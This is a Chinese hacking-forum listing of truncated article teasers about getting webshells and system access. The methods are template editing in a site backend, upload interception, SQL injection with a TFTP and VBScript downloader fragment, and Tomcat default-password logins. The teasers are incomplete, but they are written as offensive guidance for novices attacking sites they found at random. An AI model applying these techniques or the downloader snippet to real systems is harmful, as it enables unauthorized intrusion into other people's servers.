文章作者:Ryat (lib3r3t)信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)注:文章首发狼族(www.wolvez.org)后由原创作者有请提交到邪恶 8进制转载请注明原始作者和出处如果后台可以在线编辑模板话下面思路方法就可以拿SHELL了:)1.后台编辑customfaq(customfaq.lang.php文件)在?后面加上复制内容到剪贴板代码:e... [阅读全文]

文章来源:华夏黑客联盟 作者:G调华丽今天第 2次给菜菜们了!呵呵``````我太NX了`````(开始装B)"那次听holy说抓包,我直没自己作过,今天自己就实战了下,成功了!RP不错! 好了,我们老进后台也没什么意思,我写帖子就写了好几种进后台思路方法了,今天给菜菜们做个进了后台,以后通过上传,然后抓包,然后在用明小子综合上传拿shell! 我随便找了个后台,还是... [阅读全文]

现在好象除了sql注射没有其他什么好思路方法了吧而sql注射时候其权限是最BT下面是整理总结出来大部分拿shell或者system思路方法 1 TFTP 使用思路方法:在本机或者肉鸡上开了TFTP .quit:end dl.vbe& echo aso=.createobject("adodb.stream"): web=createobject("microsoft.xmlhttp")... [阅读全文]

有些Tomcat安装的后没有修改默认密码(用户名admin密码为空)这样就可以直接登录进去有两个目录可以访问:/admin/manager/html/admin 目录下利用:Service--host--actions--Create New Context建立虚拟目录Document Base填你想浏览目录比如c:\Path自己随便写例如/guizai然后直接http://ip/guizai 就... [阅读全文]